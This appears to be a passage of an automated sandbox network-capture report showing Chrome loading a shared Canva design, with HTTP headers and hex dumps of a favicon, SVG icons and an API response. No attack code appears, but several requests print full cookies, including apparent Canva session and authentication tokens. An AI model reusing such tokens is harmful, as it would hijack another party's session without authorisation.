                                                                                                                                                                                                                                                                    Data Ascii: 01-2.615 1.801-.868 0-1.535-.569-1.787-1.727-.654 1.108-1.51 1.736-2.568 1.736-1.188 0-1.967-.895-2.088-2.616-1.078 2.077-3.075 3.851-5.359 3.851C8.937 36.074 7 33.708 7 29.783 7 24.85 10.85 21 14.675 21c2.316 0 3.623 1.182 3.623 2.793 0 1.612-1.182 2.794
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC157INData Raw: 32 33 33 2e 35 31 33 20 30 20 2e 37 32 2e 31 38 37 2e 37 32 2e 35 36 36 61 31 2e 34 31 37 20 31 2e 34 31 37 20 30 20 30 20 31 2d 2e 30 38 2e 34 31 38 63 2d 2e 34 30 33 20 31 2e 33 30 33 2d 31 2e 32 31 32 20 34 2e 31 35 39 2d 31 2e 32 31 32 20 35 2e 35 30 33 20 30 20 2e 35 34 2e 31 32 35 2e 38 38 33 2e 34 33 33 2e 38 38 33 2e 35 33 36 20 30 20 31 2e 31 38 38 2d 2e 38 32 20 31 2e 36 37 2d 32 2e 31 39 35 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e
                                                                                                                                                                                                                                                                    Data Ascii: 233.513 0 .72.187.72.566a1.417 1.417 0 0 1-.08.418c-.403 1.303-1.212 4.159-1.212 5.503 0 .54.125.883.433.883.536 0 1.188-.82 1.67-2.195z" fill="#fff"/></svg>


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    75192.168.2.1249799104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC851OUTGET /static/images/favicon-1.ico HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1363INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:45 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                                                                                    Content-Length: 4414
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59512ef9508cc3-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 804783
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "a0c86da7fc37ea50e848c4733761d53e"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:31 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Thu, 26 Sep 2024 23:42:56 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-id-2: qmu3uJIrITcBkPZN3RSh6KNHzdpLU8UCmnheU/729R4Vqvv6b0vAIElprWUjy17EBzhwaUtlF5dAgmBSrNX8MJi3cY706Gq5
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: QHY2G6YRGMK0V2M3
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: REYKMVSvn4pQBvQM7t126sw17ADi9h4U
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7S4S%2FFZIIamKg%2F2NICCpBpPXSRWLAT6sVY8ZUuHFzuy%2FBHZqa9hzh6VOqKTrZ9b5FzqHFBHfE7E2LyDIWEQ5tYuTsqKUWLBkUpZCJ0XnRcy5o6WKePRaJ%2Bp1pcVNZ7OY9JM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC92INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1283INData Raw: 00 00 01 00 01 00 20 20 00 00 01 00 20 00 28 11 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 10 00 00 13 0b 00 00 13 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 01 ff 40 80 04 00 00 00 00 00 00 00 00 f3 23 68 16 f9 21 67 5c fc 22 68 9d fa 21 69 c9 f8 23 6b e3 f7 24 6c fb f6 24 6e fb f5 24 6f e3 f2 25 71 c9 f2 25 72 9d f1 27 73 5b e8 23 74 16 00 00 00 00 00 00 00 00 ff 40 80 04 ff 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 55 55 03 00 00 00 00 00 00 00 00 f9 2c 5d 29 fa 2b 5f 9f fb 29 62 f2 ff 2a 6a ff ff 29 6c ff ff 27 6c ff ff 25 6c ff f8 24 6b ff f7
                                                                                                                                                                                                                                                                    Data Ascii: (( @ @#h!g\"h!i#k$l$n$o%q%r's[#t@UU,])+_)b*j)l'l%l$k
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 62 48 ff e6 4d 28 ff e5 3c 00 ff f4 cb c8 ff ff ff ff ff e9 88 85 ff e3 3f 42 ff e4 53 5e ff e4 49 60 ff e5 43 65 ff e5 3d 6b ff e7 37 71 fa f6 36 7e ff e5 30 78 9f 00 00 00 00 dc 74 2e 16 e1 78 33 f2 e4 78 32 ff e2 75 32 fe e3 74 33 ff e4 73 33 ff e5 74 3d ff e4 5f 00 ff f8 e2 dc ff ff ff ff ff ff ff ff ff fa e7 e4 ff e5 58 00 ff e7 6d 45 ff e7 69 3e ff e6 67 3c ff e6 67 3d ff e5 66 3f ff e5 6a 48 ff e5 67 48 ff e1 35 00 ff f7 dd db ff fa ea ea ff e0 3e 27 ff e2 5b 59 ff e3 51 59 ff e3 4c 5f ff e3 46 64 ff e4 40 6a fe e7 3a 72 ff e6 35 75 f2 dc 2e 74 16 e0 81 2d 5b ed 89 30 ff de 80 2d fb e0 7f 2d ff e0 7d 2e ff e1 7d 33 ff e1 75 16 ff e5 8b 5e ff fe fa f9 ff ff fe fe ff ff ff ff ff ef b9 a9 ff e2 5d 00 ff e5 75 41 ff e4 6f 36 ff e4 6f 38 ff e4 6e 39 ff
                                                                                                                                                                                                                                                                    Data Ascii: bHM(<?BS^I`Ce=k7q6~0xt.x3x2u2t3s3t=_XmEi>g<g=f?jHgH5>'[YQYL_Fd@j:r5u.t-[0--}.}3u^]uAo6o8n9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 00 ff d3 bf 4e ff fd fc f9 ff ff ff ff ff ff ff ff ff dc ca 85 ff cd ae 00 ff d1 b2 26 ff d1 ae 0e ff d1 ac 12 ff d2 aa 1d ff d1 a4 00 ff d6 ad 4f ff fc f8 f5 ff ff ff ff ff ea d5 bb ff d0 8e 00 ff d5 97 36 ff d5 90 2a ff d6 8b 2f ff d7 85 33 ff d8 80 38 ff d8 7a 3c fb e8 7a 46 ff db 6f 45 5c d1 ae 0c 16 d0 b3 0e f2 d1 b7 0c ff cf b7 0a fe ce b8 09 ff ce b9 08 ff ce ba 05 ff cf bc 26 ff c9 b5 00 ff e6 de b3 ff ff ff ff ff ff ff ff ff f5 f1 e2 ff cc b4 00 ff cf b7 20 ff cf b4 16 ff cf b1 0d ff d0 af 0f ff d1 ae 28 ff ce a2 00 ff f1 e7 d6 ff ff ff ff ff f8 f3 ec ff d3 9d 1d ff d3 98 23 ff d4 94 29 ff d5 8f 2c ff d6 89 30 ff d7 85 34 fe da 7f 3a ff d9 78 3e f2 dc 74 46 16 00 00 00 00 cf b5 0b 9f dd c3 0b ff ce b9 09 fa ce ba 08 ff ce bb 07 ff cd bc 07 ff cd
                                                                                                                                                                                                                                                                    Data Ascii: N&O6*/38z<zFoE\& (#),04:x>tF
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC393INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 01 bf bf 00 04 00 00 00 00 00 00 00 00 c5 b9 00 16 ca bf 03 5c cd c0 03 9d cc c0 04 c9 ce bf 04 e3 cd be 05 fb cd bd 06 fb ce bd 07 e3 ce ba 08 c9 ce b9 0a 9d cd b4 0b 5c d1 ae 0c 16 00 00 00 00 00 00 00 00 ff bf 00 04 ff ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                    Data Ascii: \\


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    76192.168.2.1249802104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1968OUTGET /_ajax/reaction/reactions/summaries?parentArtifactType=DOCUMENT&source=B&reactedObjectType=B&limit=100&documentId=DAGXBQfQ3AM&documentExtension=BvO9V97vV3Qk87FqBY6pdQ HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    X-Canva-Brand: BAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-App: design_viewer
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    X-Canva-Build-Sha: 4aaacc3
                                                                                                                                                                                                                                                                    X-Canva-User: UAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-Analytics: AAMAA1dFQgA=
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    X-Canva-Request: findreactionsummaryapi
                                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                    X-Canva-Locale: en
                                                                                                                                                                                                                                                                    X-Canva-Build-Name: 20241118-21
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1063INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:45 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59512ef8cb7c8e-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors 'self' https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: sameorigin
                                                                                                                                                                                                                                                                    x-request-id: 8e59512ef8cb7c8e
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ve%2BQxh3TpLWxegosJ9TZySUccMgIdgeoANLxgrmkK3t5JKFt0bYVmWITuCeWMFoqX%2F%2BOEfX2ZJmlGKWwyaCTM7ONJrsGfHSA3NdoCDrYKjzZdX7vFDAw03RcZWGFzpI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC63INData Raw: 33 39 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 41 22 3a 7b 22 41 3f 22 3a 22 41 22 2c 22 41 22 3a 5b 5d 2c 22 42 22 3a 5b 5d 2c 22 44 22 3a 5b 5d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 39'"])}while(1);</x>//{"A":{"A?":"A","A":[],"B":[],"D":[]}}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    77192.168.2.1249800104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC871OUTGET /web/images/9abc2241bf1479263a0a039f3d1e5b5c.svg HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:45 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                    Content-Length: 2312
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59512eebfa7288-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 59287
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "9abc2241bf1479263a0a039f3d1e5b5c"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:31 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 09 Oct 2024 00:47:36 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 10 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: l/jaYL1CviTcpi7IWVApay5evvQjiyTF0qGASq10lAlLjKqPJwUIPFOx/HpRvyXWnQCevqxqMj0p6mGu3pKr7MmJ7cobB3atMJ+YiNfcAbc=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 0HNPB33TD9TRGMXH
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 5JBm5P5CmruT2rPkvXmLOGpjKegm8Zvj
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC354INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 43 6b 5a 63 4f 4f 76 45 32 6c 58 63 64 6e 45 43 4b 61 25 32 42 70 4f 31 34 45 58 46 51 49 6e 50 78 53 78 52 6b 6e 36 67 62 49 45 6f 25 32 46 38 54 33 35 33 31 25 32 42 31 51 7a 32 6e 47 6b 57 71 47 66 53 6f 4c 39 54 44 4c 55 66 58 33 53 5a 32 38 52 64 7a 31 37 35 6a 61 4a 47 30 34 73 25 32 42 42 6e 53 43 48 39 4e 4f 46 7a 6c 62 31 67 36 48 4e 63 36 30 35 37 79 49 4e 53 73 38 75 63 59 72 43 42 54 4e 69 25 32 42 6b 78 77 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CkZcOOvE2lXcdnECKa%2BpO14EXFQInPxSxRkn6gbIEo%2F8T3531%2B1Qz2nGkWqGfSoL9TDLUfX3SZ28Rdz175jaJG04s%2BBnSCH9NOFzlb1g6HNc6057yINSs8ucYrCBTNi%2Bkxw%3D"}],"group":"cf-nel","max_age":60
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1165INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 36 20 33 36 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 45 46 39 36 34 35 22 20 64 3d 22 4d 33 32 2e 33 30 32 20 32 34 2e 33 34 37 63 2d 2e 36 39 35 2d 31 2e 30 31 2d 2e 33 30 37 2d 32 2e 34 37 2d 2e 34 38 2d 34 2e 30 38 32 2d 2e 31 37 38 2d 32 2e 36 33 2d 31 2e 33 30 38 2d 35 2e 31 37 38 2d 33 2e 35 2d 37 2e 32 31 36 6c 2d 37 2e 34 36 36 2d 36 2e 39 34 32 73 2d 31 2e 34 37 31 2d 31 2e 33 36 39 2d 32 2e 38 34 31 2e 31 30 33 63 2d 31 2e 33 36 38 20 31 2e 34 37 31 2e 31 30 34 20 32 2e 38 34 2e 31 30 34 20 32 2e 38 34 6c 33 2e 31 35 34 20 32 2e 39 33 34 20 32 2e 37 33 34 20 32 2e 35 34 32 73 2d 2e
                                                                                                                                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#EF9645" d="M32.302 24.347c-.695-1.01-.307-2.47-.48-4.082-.178-2.63-1.308-5.178-3.5-7.216l-7.466-6.942s-1.471-1.369-2.841.103c-1.368 1.471.104 2.84.104 2.84l3.154 2.934 2.734 2.542s-.
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1147INData Raw: 31 2e 30 30 31 20 30 20 30 20 31 2d 2e 33 33 33 2e 30 35 37 7a 6d 32 39 2e 34 36 2d 32 31 2e 37 36 37 61 31 20 31 20 30 20 30 20 31 2d 2e 37 30 37 2d 31 2e 37 30 38 6c 33 2e 35 35 32 2d 33 2e 35 35 61 31 20 31 20 30 20 30 20 31 20 31 2e 34 31 34 20 31 2e 34 31 35 6c 2d 33 2e 35 35 32 20 33 2e 35 35 61 2e 39 39 33 2e 39 39 33 20 30 20 30 20 31 2d 2e 37 30 37 2e 32 39 33 7a 6d 2d 34 2e 31 36 34 2d 31 2e 36 39 37 61 31 20 31 20 30 20 30 20 31 2d 2e 39 34 34 2d 31 2e 33 33 31 6c 2e 39 37 2d 32 2e 37 37 33 61 31 20 31 20 30 20 30 20 31 20 31 2e 38 38 38 2e 36 36 6c 2d 2e 39 37 20 32 2e 37 37 33 61 31 20 31 20 30 20 30 20 31 2d 2e 39 34 34 2e 36 37 31 7a 6d 36 2e 31 34 33 20 35 2e 37 37 34 61 31 2e 30 30 31 20 31 2e 30 30 31 20 30 20 30 20 31 2d 2e 33 33 33 2d
                                                                                                                                                                                                                                                                    Data Ascii: 1.001 0 0 1-.333.057zm29.46-21.767a1 1 0 0 1-.707-1.708l3.552-3.55a1 1 0 0 1 1.414 1.415l-3.552 3.55a.993.993 0 0 1-.707.293zm-4.164-1.697a1 1 0 0 1-.944-1.331l.97-2.773a1 1 0 0 1 1.888.66l-.97 2.773a1 1 0 0 1-.944.671zm6.143 5.774a1.001 1.001 0 0 1-.333-


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    78192.168.2.1249797104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC871OUTGET /web/images/3e78ef31f2928a74c6d7ba19b91d0570.svg HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
